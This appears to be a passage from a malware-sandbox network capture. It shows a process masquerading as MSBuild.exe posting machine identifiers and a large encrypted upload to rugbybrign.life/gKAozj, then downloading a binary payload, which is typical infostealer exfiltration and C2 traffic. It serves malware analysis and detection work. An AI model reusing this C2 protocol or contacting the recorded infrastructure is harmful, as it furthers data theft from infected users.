                    2025-03-17 07:20:15 UTC15331OUTData Raw: 2d 2d 35 35 4b 4f 30 36 6b 65 30 6c 68 52 6c 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 63 37 62 63 66 66 66 64 62 35 34 39 35 37 37 35 30 62 30 63 35 61 31 35 31 64 32 61 37 34 39 61 30 31 31 36 35 30 65 34 64 32 64 64 36 61 61 30 65 61 34 63 39 61 63 0d 0a 2d 2d 35 35 4b 4f 30 36 6b 65 30 6c 68 52 6c 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 35 4b 4f 30 36 6b 65 30 6c 68 52 6c 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34
                    Data Ascii: --55KO06ke0lhRlxContent-Disposition: form-data; name="uid"ec7bcfffdb54957750b0c5a151d2a749a011650e4d2dd6aa0ea4c9ac--55KO06ke0lhRlxContent-Disposition: form-data; name="pid"3--55KO06ke0lhRlxContent-Disposition: form-data; name="hwid"4
                    2025-03-17 07:20:15 UTC5094OUTData Raw: b3 21 c0 8a 2e a5 06 0f 9e 7c 0a 51 78 46 cb ba c5 42 d8 31 5b 77 77 52 bb 94 42 f8 52 8c 2c 71 ae 70 89 d4 0d d2 e7 5a 32 24 09 1a 3c 0f 13 9b 4f 3e 7c 0a 5e a3 85 89 fc 0b 2b 80 f4 e5 26 62 88 8c a5 14 4d 3f 73 c0 6d e8 d0 68 b2 e9 7e f5 40 4a a2 95 3c 5d 33 6c 3d 15 53 da 10 cd 4c df 6a b7 a6 2e a9 d2 9b 60 87 18 cb bf 8c 8d aa b6 f2 58 30 d3 d5 3e 32 d3 4e 88 c8 aa 15 97 b5 dd de 3f a3 ed 58 1d 90 76 5b 75 f2 11 54 d2 a7 d1 11 8f b1 30 60 42 b3 d2 0b e3 55 27 4a 34 fc 2b 7b 61 33 05 52 87 41 a5 0e 9e 21 80 fa 3a 8f 03 fb 5f 44 8a 1b 6e 3a 72 4a d5 d3 48 8b 46 78 8e dd 49 07 66 db 74 54 02 58 dd ae 2a c8 2e 84 2f b0 8f 11 49 a0 d9 64 31 00 d5 4f 08 7a c9 cc e1 7e 0e 46 fb d7 0f 98 6a 0d 57 dd 8d 1c e4 d0 96 d4 71 0f 85 1d d2 45 f7 7d af 6b 14 f7 18 66
                    Data Ascii: !.|QxFB1[wwRBR,qpZ2$<O>|^+&bM?smh~@J<]3l=SLj.`X0>2N?Xv[uT0`BU'J4+{a3RA!:_Dn:rJHFxIftTX*./Id1Oz~FjWqE}kf
                    2025-03-17 07:20:15 UTC818INHTTP/1.1 200 OK
                    Date: Mon, 17 Mar 2025 07:20:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1l%2FKKJp5o6wigEUGw4i7f1GrZOuZs92wlks2ytVQitjNOUrNM4KU5o%2Blp6yTWfUUfo6O%2FksGBjeZpArSG1R%2Fz7xLN%2BIivmh3ORP6xZGVMHOHDlMttYAY5xH9rR7xvFWJL4k%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 921aba07cfd342b0-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1570&rtt_var=598&sent=17&recv=27&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21385&delivery_rate=1813664&cwnd=236&unsent_bytes=0&cid=564e41bf7b753c58&ts=604&x=0"
                    2025-03-17 07:20:15 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a
                    Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
                    2025-03-17 07:20:15 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.449718104.21.32.14437892C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2025-03-17 07:20:16 UTC282OUTPOST /gKAozj HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=PuV80Y51a299gTs0N
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 2685
                    Host: rugbybrign.life
                    2025-03-17 07:20:16 UTC2685OUTData Raw: 2d 2d 50 75 56 38 30 59 35 31 61 32 39 39 67 54 73 30 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 63 37 62 63 66 66 66 64 62 35 34 39 35 37 37 35 30 62 30 63 35 61 31 35 31 64 32 61 37 34 39 61 30 31 31 36 35 30 65 34 64 32 64 64 36 61 61 30 65 61 34 63 39 61 63 0d 0a 2d 2d 50 75 56 38 30 59 35 31 61 32 39 39 67 54 73 30 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 75 56 38 30 59 35 31 61 32 39 39 67 54 73 30 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68
                    Data Ascii: --PuV80Y51a299gTs0NContent-Disposition: form-data; name="uid"ec7bcfffdb54957750b0c5a151d2a749a011650e4d2dd6aa0ea4c9ac--PuV80Y51a299gTs0NContent-Disposition: form-data; name="pid"1--PuV80Y51a299gTs0NContent-Disposition: form-data; name="h
                    2025-03-17 07:20:16 UTC814INHTTP/1.1 200 OK
                    Date: Mon, 17 Mar 2025 07:20:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2a5pTX4SoZCKQNzPDmvtqry0g07gGaOfuf5tVfgMteiD3TIiTyrap7X3trA%2BZ5oYmzs0C%2BOgb5hYnWgDqP%2FX1onEGYN%2BTGpcf2URI8RLGOQ3QDXjPyrwCW4YZ8Je5Hay8zA%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 921aba0f3f0fc468-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1620&rtt_var=612&sent=6&recv=10&lost=0&retrans=0&sent_bytes=2837&recv_bytes=3603&delivery_rate=1779402&cwnd=238&unsent_bytes=0&cid=f834add374170563&ts=450&x=0"
                    2025-03-17 07:20:16 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a
                    Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
                    2025-03-17 07:20:16 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.449720104.21.32.14437892C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2025-03-17 07:20:17 UTC280OUTPOST /gKAozj HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=DA2DGBhVFVDHc
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 567561
                    Host: rugbybrign.life
                    2025-03-17 07:20:17 UTC15331OUTData Raw: 2d 2d 44 41 32 44 47 42 68 56 46 56 44 48 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 63 37 62 63 66 66 66 64 62 35 34 39 35 37 37 35 30 62 30 63 35 61 31 35 31 64 32 61 37 34 39 61 30 31 31 36 35 30 65 34 64 32 64 64 36 61 61 30 65 61 34 63 39 61 63 0d 0a 2d 2d 44 41 32 44 47 42 68 56 46 56 44 48 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 41 32 44 47 42 68 56 46 56 44 48 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 34 33
                    Data Ascii: --DA2DGBhVFVDHcContent-Disposition: form-data; name="uid"ec7bcfffdb54957750b0c5a151d2a749a011650e4d2dd6aa0ea4c9ac--DA2DGBhVFVDHcContent-Disposition: form-data; name="pid"1--DA2DGBhVFVDHcContent-Disposition: form-data; name="hwid"4043
                    2025-03-17 07:20:17 UTC15331OUTData Raw: 37 de 54 17 38 e3 31 d5 62 8f 75 ea cc 9b 63 3d e5 53 27 1b 8e 20 37 c2 43 52 a8 a2 c2 df 01 34 8b 48 1e 9b b8 d0 f1 c9 05 32 3d 92 c8 48 14 72 ee a6 74 b6 c1 d5 36 60 b6 a5 f4 33 ff a2 fd d0 92 95 09 7c 6c e6 2a 55 ef 53 bf 93 5e 69 71 37 20 bc a5 58 d5 17 d5 4d 82 87 f8 70 b2 2c bf 4d d5 be 9a 00 a4 a8 1c e5 c5 b6 81 e0 6a cb 0a 7a 72 2d 8d 5a bc 93 fb 0f e1 30 60 b4 09 12 e7 16 34 2b bc 36 a1 cc d3 00 0a ce a5 8a f1 00 b4 9c 3e 3b 19 bb 23 81 9a eb 34 bc c4 8a cd de e3 f4 51 34 4e 7d 47 e4 2b 14 6a 80 c8 45 86 25 50 2e b9 df 19 00 01 e0 52 1d 35 eb b0 59 85 29 2a 00 48 24 d2 59 6b 4b 28 a6 7e 5c 0d 0f e9 b4 5e 01 43 49 90 20 d0 4c 04 1c 15 c3 c6 6d 40 5d 59 24 13 64 20 6a 24 47 25 52 c9 98 fc 0a fb 9c 34 e8 f7 c6 31 1e 83 f4 79 23 b0 ee 7e bd 35 9a 1d
                    Data Ascii: 7T81buc=S' 7CR4H2=Hrt6`3|l*US^iq7 XMp,Mjzr-Z0`4+6>;#4Q4N}G+jE%P.R5Y)*H$YkK(~\^CI Lm@]Y$d j$G%R41y#~5
                    2025-03-17 07:20:17 UTC15331OUTData Raw: a7 f1 a5 9a d9 1f 1d e2 c2 14 ea 6f c0 e7 92 69 6f f0 12 d7 a0 c8 99 5d ae f9 e8 ee ec d7 f6 23 17 67 65 0f ae df 33 6b 18 97 11 aa 94 01 31 15 45 88 bf 24 0e a5 3b d8 cb a7 d6 68 12 09 22 95 da 62 35 e9 f6 b4 26 0f 51 a4 2a 46 8c b4 e0 e8 07 e7 13 0b 4c 6b d2 d7 f3 ac 8d c7 58 b6 f9 fd 07 d6 02 c6 3f 4b 63 77 2c 92 7d c2 dc 44 ff db fa af dd f7 5d 80 98 ae a8 73 52 75 9a 76 bf 11 69 e2 52 cd 4e be 80 f0 f6 29 f8 62 76 ed 1e 21 a5 a6 4c d1 60 dc f0 49 03 bc b0 ce 21 5e cb d0 62 27 ef c0 83 82 5f 46 ab 9f 62 7c e3 61 9d eb 27 de fd 6a fe fa 7a ca 78 bc 7f d4 7c f1 9e 28 11 dc e8 7a 9f 86 9b 06 4a 97 72 74 b3 ca f3 7b 49 c7 80 d8 16 eb 2b 64 46 9a 2e dc 27 c3 f0 31 32 f2 12 22 41 25 63 3f 75 2a bf 61 04 ca d2 55 df 57 45 b6 d3 89 7b 89 65 be 73 50 63 45 0a
                    Data Ascii: oio]#ge3k1E$;h"b5&Q*FLkX?Kcw,}D]sRuviRN)bv!L`I!^b'_Fb|a'jzx|(zJrt{I+dF.'12"A%c?u*aUWE{esPcE
                    2025-03-17 07:20:17 UTC15331OUTData Raw: 45 a6 c8 96 77 f4 a7 4e 9d df 18 58 51 db 0c 2e ed 29 41 d4 10 af 73 a5 50 f8 3b ce 8a b8 1e c2 55 b1 07 d8 86 71 cf b9 c5 27 42 10 5b f1 fe 1f 49 6f 3d 94 9d 49 0c ae ab e4 e0 b1 0f f8 ff 3f 82 8f d5 15 3e aa 55 61 2a df ca 04 c5 4a 0e 71 e3 4f 8d 58 7b ae 42 24 6a 88 a8 a9 78 6a 6d 0a 2d 61 52 4d 94 be bd 94 a9 a2 2c c9 ee c3 7a 2f d1 28 cb 54 81 c1 f6 cf 4a af 64 7f e4 1e 85 67 01 06 7e 2a eb 02 93 13 ec 31 43 85 a1 e8 19 11 71 87 7f 46 d9 d5 d6 f3 33 f1 20 4b 95 26 dd cf 1a 75 c6 f6 7c 71 4c a0 61 3c 57 46 fd d7 a7 3d 72 54 93 d4 71 b7 ed a7 3f b2 1b 5b fe b5 13 c4 50 5b 91 57 8c 40 67 9b f3 d2 48 a6 cc b5 5e 3d 4d b5 cd ac 90 40 14 33 97 2d 75 41 e0 f8 bc b5 02 9d 70 aa 45 81 e2 b9 ce 69 f5 83 0e 70 a4 bb 09 a0 1c 3a 22 eb 28 24 ca 51 54 67 91 3d fd
                    Data Ascii: EwNXQ.)AsP;Uq'B[Io=I?>Ua*JqOX{B$jxjm-aRM,z/(TJdg~*1CqF3 K&u|qLa<WF=rTq?[P[W@gH^=M@3-uApEip:"($QTg=
                    2025-03-17 07:20:17 UTC15331OUTData Raw: 81 82 dd bd 56 3b 11 7a 54 0e e9 62 60 38 d4 73 42 74 ef 28 a9 52 1e 7a 41 bc f8 39 04 4c 05 0e 42 d9 8c 47 b6 6a 03 d9 f3 23 ea 3f 20 0d f8 c0 4c f7 e2 28 4d 76 7d 8d 67 7d 7b 0e bc c1 8f 44 5e e6 1d ef 95 0e 3a cc 31 5a 20 22 9c 39 aa 96 83 7c e0 e9 16 39 7c 93 24 31 af 11 d4 70 cd ca 1f ec 84 fb 5f 53 bb 0a a4 1a 52 9a 20 97 64 15 1e 8a fb e1 75 e6 21 96 c2 98 08 2e 70 27 dc 62 4f 23 19 64 00 0d 56 b7 76 40 ed 82 d9 40 d5 04 1d 2c b8 53 0b 4b 16 dc 9d 48 d4 6b 85 42 05 9c a7 f4 76 65 4b 36 f5 da e5 78 5f 36 75 cb 31 94 3f f5 ff 8d 5d 84 af 62 cc 34 8d 6b 8e 0d b3 18 78 f6 f1 00 e4 e0 5e 56 e8 d2 1a 05 09 c6 46 0a af 9a da 0b 77 c7 c1 df 1d 92 98 9b 7a 50 8c 47 e9 f0 79 3b 31 7c 6b 42 a7 eb d5 6d d8 bc b0 c1 15 49 1b 75 95 a9 d4 bf a5 7c 90 48 32 21 5a
                    Data Ascii: V;zTb`8sBt(RzA9LBGj#? L(Mv}g}{D^:1Z "9|9|$1p_SR du!.p'bO#dVv@@,SKHkBveK6x_6u1?]b4kx^VFwzPGy;1|kBmIu|H2!Z
                    2025-03-17 07:20:17 UTC15331OUTData Raw: 6e 8f a5 f6 68 67 78 72 31 dd d4 59 a6 b9 b6 b7 33 9b 75 38 69 f9 cb a3 a6 16 fd 86 bf 34 05 78 fb d2 2e f3 ee 9f 74 33 15 45 8b 8d 77 d4 30 50 01 fc 3b 82 56 1e f7 c6 78 34 8e 05 ee a6 d3 07 bd c2 7e 6e eb 42 73 27 72 7a 7b 3e 09 47 42 38 12 18 d1 03 0e 88 43 cf f6 db 2b b3 f0 c4 1a 09 aa 1d be 62 2e 6f 7b cb 18 a2 47 8f 83 b6 a8 7d 74 38 cb c2 eb 56 8d 6c 88 f8 f5 52 32 15 89 27 f3 ad a5 1e 43 86 5e 0a 14 bf 08 43 ec ee a5 1f 06 30 a7 d4 e1 58 a6 b1 da ce a5 2e e6 3a 24 23 82 0c 5d 84 62 9c 91 47 b9 c6 7e df 79 03 54 fe d4 bf 9d 93 28 18 1e 3a 21 af bc 20 65 58 13 04 13 59 2b 7d 50 62 5f 49 64 56 96 27 02 73 09 6c fa cb af 09 ea e3 f1 95 71 80 f6 84 9c 81 20 ee 83 7d e1 b6 eb 63 dd 34 06 a9 db 10 f0 32 28 56 04 31 df 9f 8c 00 2d 0f bb 6e b5 ff 5e 1c 04
                    Data Ascii: nhgxr1Y3u8i4x.t3Ew0P;Vx4~nBs'rz{>GB8C+b.o{G}t8VlR2'C^C0X.:$#]bG~yT(:! eXY+}Pb_IdV'slq }c42(V1-n^
                    2025-03-17 07:20:17 UTC15331OUTData Raw: dd 09 df f4 e8 2a 88 47 b7 d5 81 9b 77 ff 12 85 35 e1 3d 1f 4c 2f d0 a8 a1 c2 71 13 8d 59 a4 2e 14 32 bd 12 90 c4 0d 21 a6 b7 d8 f7 2f 31 0e 9f 5b 91 90 71 5f 78 1b 5b aa ad 47 63 34 ec 10 c8 65 33 d6 82 79 c9 70 9e 32 b9 b2 7e 7e d4 35 0c a7 c3 76 56 f2 d9 ba d6 1b dd 4a 80 96 97 1f 2a 28 7d f6 91 83 2b 5f 76 8b c1 ec 8d 2c 89 9f c7 78 e0 e7 f6 ae 2e c0 8d 2d 25 e6 89 c2 44 6d 59 cc f0 b8 61 8b d6 0d 53 b2 56 1d 9c 5e 59 30 af 5f c0 01 ef d5 f2 b2 12 07 10 4f 21 be df 69 a0 23 a3 53 c5 60 f2 b8 3a 2a d0 62 a0 8b f2 10 46 60 90 67 bc ca 44 fb 5c b3 9f e0 24 bd d8 3a 46 57 b8 42 72 15 aa 34 73 f3 a5 9c 1b f4 9e da 36 77 8c 41 b5 98 15 e0 47 88 66 69 ab 41 1c 40 27 4f 23 e8 fe 21 13 45 6e 67 69 f2 f0 09 2a d0 f8 9f eb 01 6c 0d 7d ad 59 3d d3 98 9d 9a e6 3e
                    Data Ascii: *Gw5=L/qY.2!/1[q_x[Gc4e3yp2~~5vVJ*(}+_v,x.-%DmYaSV^Y0_O!i#S`:*bF`gD\$:FWBr4s6wAGfiA@'O#!Engi*l}Y=>
                    2025-03-17 07:20:17 UTC15331OUTData Raw: db 05 77 de c8 35 40 05 da f5 e8 3b 34 88 c6 5d 2a c7 ca 27 ed c6 3b b2 43 26 88 f6 97 f3 4f 85 54 e7 fc 1b d2 f7 37 1a a2 7c 2f c5 13 c5 cd 6c 9d 9f d9 0e aa ff f5 78 83 6d db 2c b8 b4 0c d6 b8 f7 8b 56 16 c4 d2 f6 a8 a4 bb 9f 4b 5d 61 11 8e 56 13 ed f6 7b 96 af 8e 9b 26 f2 64 e6 e5 63 9d 2a 65 d8 40 a6 b4 90 12 6c c8 bd 7f 97 2e 01 d0 09 d9 50 fe e4 97 44 c9 d6 ae e2 51 06 9e 64 7b a0 e5 8e 23 11 f6 ed b3 d0 3c 8e ab aa 03 a3 d4 45 4d 76 68 82 bc e6 f5 a2 c5 bc 97 2c e7 06 68 06 a7 e6 a8 56 25 ce a5 d6 a3 58 85 43 71 75 c9 72 64 51 3a b5 4a b7 cc 90 63 ef de ba 2f 2c bf 39 56 58 6a 34 0e 1e 6f 9b cf a8 06 67 5e d2 30 76 32 91 16 e9 f4 3f 29 52 b0 87 6a 0d 2b 9c 2d 77 2a f2 f5 c7 16 4a 08 37 30 30 ca c8 91 93 94 00 8c 4d 14 3c f3 61 e0 9c 51 89 30 18 85
                    Data Ascii: w5@;4]*';C&OT7|/lxm,VK]aV{&dc*e@l.PDQd{#<EMvh,hV%XCqurdQ:Jc/,9VXj4og^0v2?)Rj+-w*J700M<aQ0
                    2025-03-17 07:20:17 UTC15331OUTData Raw: 10 1d 61 3f 6d d2 5f 9d c6 03 00 17 9c 42 32 f4 94 b7 c6 e5 c7 80 d3 ea cc 04 5e b3 ea 06 b8 42 78 1d 80 e9 aa 14 26 a8 1e 45 15 c1 c5 39 b1 66 a7 93 48 8f 6a 85 af 45 df 3c cb ab 8b df dc 09 c9 e7 1a 43 25 9c b6 2c fa 00 5a 8e 1b 33 9d 08 bc 57 f0 8d b7 4c 63 81 a8 f7 34 dc ca b7 d9 b0 d5 a0 15 e7 2f e6 5d b2 bf 04 ad 3e b1 17 bf 1d 52 da 00 fd 03 dd 71 37 92 f2 ec a7 7b fb 59 9d f7 1f f8 f5 87 0c e5 24 ca 8b 56 0d 2e f9 60 bf 8a 6a d3 77 42 53 00 cb c9 00 b9 55 aa 34 4f c8 d7 f1 61 d1 14 39 1d 0e bd e2 e0 95 52 8e fe 39 85 5e ea ca 2f 62 e8 07 3a 6c b7 2b 05 f6 7f b4 1a fd 6c 99 1b 93 76 2a 13 88 72 54 37 6d bb e6 39 48 df e8 63 30 11 63 23 32 02 17 2c fc 1c 71 90 4a 48 2b 33 00 1f 93 fb 32 94 dd 59 0e 13 ec d6 b2 10 59 7f 64 ea 49 7b 4e 38 cc 59 4a e2
                    Data Ascii: a?m_B2^Bx&E9fHjE<C%,Z3WLc4/]>Rq7{Y$V.`jwBSU4Oa9R9^/b:l+lv*rT7m9Hc0c#2,qJH+32YYdI{N8YJ
                    2025-03-17 07:20:17 UTC15331OUTData Raw: 2e cf 6d 24 98 1b 9e dc 01 9b 14 6a eb 24 c5 87 f4 3a 1e db 36 d3 5e 4e 4c c0 0b 9f 8e 56 64 56 be be 65 15 19 b8 1b b1 69 14 25 80 2e c4 c7 45 b9 df 39 58 7d 66 e4 83 6d e4 0b 18 11 85 c8 31 b5 f5 2a 02 24 c4 99 41 14 0b b1 ce 1a 77 27 37 56 23 44 75 f5 11 5a 7f b7 2c 41 1b 84 54 15 70 33 f1 86 99 3f b4 6d d4 0b d7 c1 f6 ee f7 04 91 fe 34 c3 4c 31 36 0a fc 5c 9e 34 28 cd 40 31 a1 9e f5 51 18 10 ac 83 fc 43 23 c7 65 42 6c 1b 77 43 b9 50 26 7f 07 36 da 9f 68 51 82 9d 7f 99 97 9f 88 f8 bf cd 51 ab 91 99 a5 3f 40 59 06 88 13 29 08 99 d5 8f 38 b1 65 3b 0f 73 bb 77 6c 9a 8f 5e e1 00 fa f8 cb 89 df 56 a6 d9 14 04 65 bf 21 10 f9 e8 01 51 64 f6 73 e9 2d 24 73 5d 40 57 a7 90 c2 9d 31 13 85 95 44 59 61 ea 62 2d 9e fd e6 07 4a e8 91 e0 af ef 2d 69 8a f3 68 81 b4 ec
                    Data Ascii: .m$j$:6^NLVdVei%.E9X}fm1*$Aw'7V#DuZ,ATp3?m4L16\4(@1QC#eBlwCP&6hQQ?@Y)8e;swl^Ve!Qds-$s]@W1DYab-J-ih
                    2025-03-17 07:20:19 UTC822INHTTP/1.1 200 OK
                    Date: Mon, 17 Mar 2025 07:20:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2XclhS3TkzT42qCrnWnaSr%2Bs6%2BNM7%2F9Z3LOkYzm3f6z724h9X4OWQRYP1DgEZqE0mS8nXwnPfCpooxjedVC4%2BgL1pKVwIdjEHzySkqaWh9fMkMMK2WX3YwA3gSU0wh%2Bc4yw%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 921aba167b59c434-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1577&rtt_var=600&sent=198&recv=585&lost=0&retrans=0&sent_bytes=2838&recv_bytes=570105&delivery_rate=1812538&cwnd=172&unsent_bytes=0&cid=71f5344a6f4d5657&ts=1533&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.449722104.21.32.14437892C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2025-03-17 07:20:19 UTC267OUTPOST /gKAozj HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 103
                    Host: rugbybrign.life
                    2025-03-17 07:20:19 UTC103OUTData Raw: 75 69 64 3d 65 63 37 62 63 66 66 66 64 62 35 34 39 35 37 37 35 30 62 30 63 35 61 31 35 31 64 32 61 37 34 39 61 30 31 31 36 35 30 65 34 64 32 64 64 36 61 61 30 65 61 34 63 39 61 63 26 63 69 64 3d 26 68 77 69 64 3d 34 30 34 33 35 45 39 38 31 32 32 42 46 39 39 38 39 32 32 37 37 34 38 38 46 33 46 39 44 32 44 41
                    Data Ascii: uid=ec7bcfffdb54957750b0c5a151d2a749a011650e4d2dd6aa0ea4c9ac&cid=&hwid=40435E98122BF99892277488F3F9D2DA
                    2025-03-17 07:20:20 UTC785INHTTP/1.1 200 OK
                    Date: Mon, 17 Mar 2025 07:20:19 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 10510
                    Connection: close
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZRgFm3CujNJ%2FQBZXwJduwT3e7%2FxZXOSd44YMeadadj%2FXzMitzjK7qUzCeWttusScmB96Nj%2Bj8O9ecRibD5EwASsgCUUkjWOIx54II4ScsWdT7oA56iWeMUuXrHtsjabmvh8%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 921aba2309f6c3ee-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1631&rtt_var=624&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1006&delivery_rate=1734997&cwnd=191&unsent_bytes=0&cid=6784688a391829be&ts=406&x=0"
                    2025-03-17 07:20:20 UTC584INData Raw: 83 c7 29 76 54 95 ab e1 e0 b0 1e a5 83 1c 9b 25 af 65 56 92 54 78 8e 6e f7 d9 b0 7a 49 f8 05 91 42 73 71 35 ff 19 ac aa a7 c5 a5 9c 85 a9 47 c1 29 19 08 e0 f3 e7 8b 84 6e f3 03 53 c2 2f 31 af e3 f4 e1 36 12 b7 55 06 f4 62 02 0a ae 88 5c 84 44 1e 67 d7 24 87 d0 55 b1 64 6d 8b 4c 35 c2 80 aa 26 4a b9 f1 69 ef ca 70 ba 1b c7 b9 fa 14 c2 ae e0 35 7f 14 a3 07 4c 8c b4 2c fc ab 80 6b b5 2b f6 25 bd a3 06 b4 0a 5f 0e 08 33 83 85 84 30 4a 44 55 56 18 a7 09 ef a8 11 23 ae 3f 03 f5 5b b3 5e 7d 2c 3f 0d f5 07 b9 1c dc 46 ab 3a 3c 50 8b d2 0c 79 76 27 e6 6e 60 5c e9 a0 0b 3d 1d f2 ec 2e 07 5e cd e4 f9 e7 31 8f 40 13 57 50 93 21 0b ce 20 0c 7c 8a e2 68 61 d9 10 6f ee e7 02 58 e0 a4 24 a8 84 93 e8 24 df 52 ca 9b 22 25 7d 39 8a 29 ce 81 da db 70 5d 16 0c 35 0e ea 94 2a
                    Data Ascii: )vT%eVTxnzIBsq5G)nS/16Ub\Dg$UdmL5&Jip5L,k+%_30JDUV#?[^},?F:<Pyv'n`\=.^1@WP! |haoX$$R"%}9)p]5*
